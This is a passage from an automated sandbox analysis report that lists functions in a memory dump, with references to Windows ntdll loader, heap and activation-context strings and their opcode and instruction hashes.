                                                      • Opcode Fuzzy Hash: 6ab01f1485abc08f47b2e41210f71233f26d810d12aad5a2dbf0499d5e01d59f
                                                      • Instruction Fuzzy Hash: 96027FB1D002299FDB61DB54CC90BAAB7B8AF54704F0441DEEB09A7241EB309F85CF69
                                                      Function 01688B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      • API String ID: 0-2515994595
                                                      • Opcode ID: a8f6e4955231c5bb919c2256db4354d3ab3c98f3c83a13636d7f644309d2a5d2
                                                      • Instruction ID: e83fe953a741d2efeab6acb9013e249581b863a8105e2283392a1255f259c584
                                                      • Opcode Fuzzy Hash: a8f6e4955231c5bb919c2256db4354d3ab3c98f3c83a13636d7f644309d2a5d2
                                                      • Instruction Fuzzy Hash: 3E519D725053119BD329EF188C84BABBBECBFD8350F544A1DF99987285E770D604CB92
                                                      Function 01690274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
                                                      • Opcode ID: 959e306c4a6cfe6e6837945b16bb2ac65d9afd3183ddedea40888b7c438de3f5
                                                      • Instruction ID: c4b3bd2116989e9ad52b71eea702bb38d4bcaf7b79733777156fd5a1a7cbf69e
                                                      • Opcode Fuzzy Hash: 959e306c4a6cfe6e6837945b16bb2ac65d9afd3183ddedea40888b7c438de3f5
                                                      • Instruction Fuzzy Hash: 66D1CA31A01686EFDF22DF68CC40AA9BBFAFF8A710F098059F5459B752C7349981CB54
                                                      Function 016689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HandleTraces, xrefs: 01668C8F
                                                      • VerifierDlls, xrefs: 01668CBD
                                                      • VerifierDebug, xrefs: 01668CA5
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01668A3D
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01668B8F
                                                      • VerifierFlags, xrefs: 01668C50
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01668A67
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      • API String ID: 0-3223716464
                                                      • Opcode ID: 908345a339b8505ae951b4719fa6e17eb1dd3f4434eaa80ad38869b85c57c1b1
                                                      • Instruction ID: 9a191cfd6b33865fabc173689e91e6ea376de7681248115970e6758456dd1158
                                                      • Opcode Fuzzy Hash: 908345a339b8505ae951b4719fa6e17eb1dd3f4434eaa80ad38869b85c57c1b1
                                                      • Instruction Fuzzy Hash: 5A911272A42712AFD721EF78CC90B5A7BADBBA4B14F04445CFA426F644C770AC05CBA5
                                                      Function 015EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      • API String ID: 0-1109411897
                                                      • Opcode ID: 493aec505ef7f5ddff60759fe4f2959b72b5db4cb8fb81cc509ba40c057b2781
                                                      • Instruction ID: e1570e4b1b38af83355ac08c4343769a63b04cbbb0fea3819e650a01940e5f0c
                                                      • Opcode Fuzzy Hash: 493aec505ef7f5ddff60759fe4f2959b72b5db4cb8fb81cc509ba40c057b2781
                                                      • Instruction Fuzzy Hash: 7DA21774E0562A8FDB68DF19CD997A9BBF5FB45304F1442EAD909AB250DB309E81CF00
                                                      Function 016163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-792281065
                                                      • Opcode ID: a5e45dff091d42f2fe938a5c01c6ef200fc754fb9ab1d7748ee4ce50856f5548
                                                      • Instruction ID: f6759c52eadf8bf71668481b3d0e03ae160183f7ae6b11b42aeec441e631e1ef
                                                      • Opcode Fuzzy Hash: a5e45dff091d42f2fe938a5c01c6ef200fc754fb9ab1d7748ee4ce50856f5548
                                                      • Instruction Fuzzy Hash: 40916871F423229BDB35DF58DC44BAA7BB2BB40B14F04805CED016B785EBB09842C795
                                                      Function 015D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01639A01
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01639A2A
                                                      • LdrpInitShimEngine, xrefs: 016399F4, 01639A07, 01639A30
                                                      • apphelp.dll, xrefs: 015D6496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01639A11, 01639A3A
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016399ED
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      • Opcode ID: 65bfed2a5161af2472bc0efd4b3801fa128c8da53ca875ffe7b9f1595bbb7c74
                                                      • Instruction ID: 95244aafa106e526f599f11b4cf6bf9fc19376d0b1f66b123f4ac5ccbe7b9614
                                                      • Opcode Fuzzy Hash: 65bfed2a5161af2472bc0efd4b3801fa128c8da53ca875ffe7b9f1595bbb7c74
                                                      • Instruction Fuzzy Hash: 095190716083059FE724DF68CC81BAB77E5FBC4748F40091DE9859B250DBB0E946CB96
                                                      Function 01612674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01652178
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01652180
                                                      • SXS: %s() passed the empty activation context, xrefs: 01652165
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0165219F
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016521BF
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01652160, 0165219A, 016521BA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: 20b9020f5b2118b4a209046d268d4a3988a951930a84623958d8e76456222be4
                                                      • Instruction ID: f13187491160a52cad81ed6a0e8af6d00ec1a6c432fa03fcce4a3af2d3ea0746
                                                      • Opcode Fuzzy Hash: 20b9020f5b2118b4a209046d268d4a3988a951930a84623958d8e76456222be4
                                                      • Instruction Fuzzy Hash: 78310636A40215ABE7218EDADCA1F6B7A69EB54E50F19405DBB046B244D7709A01CBA0
                                                      Function 0161C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01658181, 016581F5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01658170
                                                      • LdrpInitializeProcess, xrefs: 0161C6C4
                                                      • LdrpInitializeImportRedirection, xrefs: 01658177, 016581EB
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0161C6C3
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 016581E5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: 8fa702729dbc40b361d532254f067679010342f0914f1cef5adbb71fabd6364d
                                                      • Instruction ID: 0f1cd5012fefb30ae273b6568c9275a35de051e3755afce5dbb2649db9fe4dab
                                                      • Opcode Fuzzy Hash: 8fa702729dbc40b361d532254f067679010342f0914f1cef5adbb71fabd6364d
                                                      • Instruction Fuzzy Hash: 153104716447169FC324EF69DC45E2A77A5BF94B10F05095CFD806B391E720EC04C7A6
                                                      Function 0162096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 01622DF0: LdrInitializeThunk.NTDLL ref: 01622DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D74
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      • API String ID: 1404860816-0
                                                      • Opcode ID: 0024e2b11792d85b938444472787c45bfac417f1b839533ed49c7dc6b2a9384c
                                                      • Instruction ID: 12d020c000f2aeb2d810c074dcc9be137e94660894c7980ff08151b4274819b7
                                                      • Opcode Fuzzy Hash: 0024e2b11792d85b938444472787c45bfac417f1b839533ed49c7dc6b2a9384c
                                                      • Instruction Fuzzy Hash: 2F425A75900715DFDB61CF28CC80BAAB7F5BF44314F1485AAE989EB241E770AA85CF60
                                                      Function 015EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: acd383981b6ba11aa9249a8402a66efd36ce335b7d0efb09cbc8b63907687da4
                                                      • Instruction ID: 02c16db7e1591eafc466b29371b784da04c24253f1a0af0d9679e541811b151e
                                                      • Opcode Fuzzy Hash: acd383981b6ba11aa9249a8402a66efd36ce335b7d0efb09cbc8b63907687da4
                                                      • Instruction Fuzzy Hash: 38C18A75908382CFD729CF68C448B6AB7E4BF84704F04886EF9958F251E774C949CB66
                                                      Function 01618402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 01618422
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0161855E
                                                      • @, xrefs: 01618591
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01618421
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: f7a2306e64640d35f3d408d1afa5e18f91a27714224af6778cea4fe35e472ea9
                                                      • Instruction ID: 18eef4eafa4815632d2794f6c73015e160d155ca0d56c8c7977d9baedba398aa
                                                      • Opcode Fuzzy Hash: f7a2306e64640d35f3d408d1afa5e18f91a27714224af6778cea4fe35e472ea9
                                                      • Instruction Fuzzy Hash: D891B971508342AFD761DF25CC90FABBAECFF84684F44092EFA8596154E730D904CB62
                                                      Function 0161273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016522B6
                                                      • SXS: %s() passed the empty activation context, xrefs: 016521DE
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016521D9, 016522B1
                                                      • .Local, xrefs: 016128D8
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: bca73249ae3a099f5975f5b105afd04cb1219b2751b18c4603066ff26ad9e142
                                                      • Instruction ID: e332e39a667280ff09de4201a588cb9cf855a72bd568cc637471dd655ebbe531
                                                      • Opcode Fuzzy Hash: bca73249ae3a099f5975f5b105afd04cb1219b2751b18c4603066ff26ad9e142
                                                      • Instruction Fuzzy Hash: 59A1BA3590022ADBDB24CF69CCA4BA9B7B1BF58354F2945EDD908AB355D7309E81CF80
                                                      Function 01614AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01653456
                                                      • RtlDeactivateActivationContext, xrefs: 01653425, 01653432, 01653451
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01653437
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0165342A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      • API String ID: 0-1245972979
                                                      • Opcode ID: edd0b447249855132fc5164c6a902fabf26762873d904816b96f044d32582cd3
                                                      • Instruction ID: 378b8359b8d445c78af1065744d7d8fa5cd27528e8daedee902c22c616b62f23
                                                      • Opcode Fuzzy Hash: edd0b447249855132fc5164c6a902fabf26762873d904816b96f044d32582cd3
                                                      • Instruction Fuzzy Hash: 43610E32651B129FD7228F1DCC81B2ABBE5BF80B90F19852DE9559F344DB30E802CB95
                                                      Function 015E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01640FE5
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016410AE
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01641028
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0164106B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: ad2b38ee37c8d7cb82d567a7cc6a6320750d826d6915d6b37969d433920ce9d2
                                                      • Instruction ID: 6a772b670b05456560a067584e37ad22e6fa896398638f3c19d54007ed03e5f9
                                                      • Opcode Fuzzy Hash: ad2b38ee37c8d7cb82d567a7cc6a6320750d826d6915d6b37969d433920ce9d2
                                                      • Instruction Fuzzy Hash: DA71AEB1A043159FCB21DF18CC88B9B7BE9AFA57A4F50086DF9488B246D734D588CF91
                                                      Function 0160245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0164A998
                                                      • apphelp.dll, xrefs: 01602462
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0164A992
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0164A9A2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: 76eb4f6f6ec14934da9e61e079a6b96cbe69b65ce7fe9ff87f91a2506f6a2a59
                                                      • Instruction ID: 4cb74187eb240cf4043e0ed6cda8de52d9cac5990ad30b2ef8bbea45e77a466c
                                                      • Opcode Fuzzy Hash: 76eb4f6f6ec14934da9e61e079a6b96cbe69b65ce7fe9ff87f91a2506f6a2a59
                                                      • Instruction Fuzzy Hash: AC3146B5E91202BBDB359F9DCC85A6AB7B5FB84B00F17001DE9026B345C7B05892C790
                                                      Function 015F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP: , xrefs: 015F3264
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015F327D
                                                      • HEAP[%wZ]: , xrefs: 015F3255
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      • API String ID: 0-617086771
                                                      • Opcode ID: 2773bb19f68e245129a61d9145ac1639d103548a8d5ec7ce7e1c3f30de08ecfc
                                                      • Instruction ID: c403dbba91cff78344529df8817e0554954d9b68c93061d4e3555cc269a02158
                                                      • Opcode Fuzzy Hash: 2773bb19f68e245129a61d9145ac1639d103548a8d5ec7ce7e1c3f30de08ecfc
                                                      • Instruction Fuzzy Hash: 40929B71A042499FEB25CF68C844BAEBBF1FF48300F18849DEA55AB391D735A945CF50
                                                      Function 015F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                                      • Instruction ID: d5b76cb1ea800d229ccae8aa852007dec9f4ed07f787f5101e91a02753b14b68
                                                      • Opcode Fuzzy Hash: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                                      • Instruction Fuzzy Hash: 9DF1BF30A01606DFEB25CF68C994B6AB7F6FF44704F1885ADE6169B392D730E941CB90
                                                      Function 01606962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      • API String ID: 0-1077428164
                                                      • Opcode ID: ecc4139566633821532ad27c4451ac5b08eda8dad24060b7e442fee1357f7e78
                                                      • Instruction ID: b920c96a94633471f20768df0be891e45b44659a4a25725bbfb521743f527968
                                                      • Opcode Fuzzy Hash: ecc4139566633821532ad27c4451ac5b08eda8dad24060b7e442fee1357f7e78
                                                      • Instruction Fuzzy Hash: BEC27F716093519FE72ACF28CC40BABBBE5AF88754F05892DE9C987381D734E845CB52
                                                      Function 015DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 3afd008a22c5fbc6584d1b0a79f4f45359c1ff049a43ee9768bd03989325de23
                                                      • Instruction ID: 1c741fe87d74e4ad9ed4cd62adb67c756052da2fb77a5ae0c14ce7abc6d9635d
                                                      • Opcode Fuzzy Hash: 3afd008a22c5fbc6584d1b0a79f4f45359c1ff049a43ee9768bd03989325de23
                                                      • Instruction Fuzzy Hash: F4A18F719116299BDB31DF28CC88BEAB7B8FF44710F1001EAE909A7251E7359E84CF54
                                                      Function 01600BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0164A117
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0164A121
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0164A10F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      • Opcode ID: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                                      • Instruction ID: e91d5cf8b0d0cc8cb65a6378a0bb8f6fb1ca77a256a9e32b5918faddf3ac6089
                                                      • Opcode Fuzzy Hash: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                                      • Instruction Fuzzy Hash: 9471C171E402069FDB2ADFA8CD81BAEB7F5FB48644F15402DE506DB351E734A942CB50
                                                      Function 015F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-1334570610
                                                      • Opcode ID: 1defb1d777b265b940bd7086c2c91b963295e239a6a9609f6fe06660bbf123dc
                                                      • Instruction ID: 3c2c7769393656a0f69a9832897860708d1c70ca49ecf12fc0812f3555d319ff
                                                      • Opcode Fuzzy Hash: 1defb1d777b265b940bd7086c2c91b963295e239a6a9609f6fe06660bbf123dc
                                                      • Instruction Fuzzy Hash: 5861B270600346DFDB29DF28C880B6ABBE2FF45704F18855DE59A8F296D770E881CB91
                                                      Function 0161C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 016582DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 016582E8
                                                      • Failed to reallocate the system dirs string !, xrefs: 016582D7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
                                                      • Instruction ID: 5d8f0b9bdaf34fcf2ff248550fad74f7eb2e70366c86f329f48f1d3ae0c39afc
                                                      • Opcode Fuzzy Hash: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
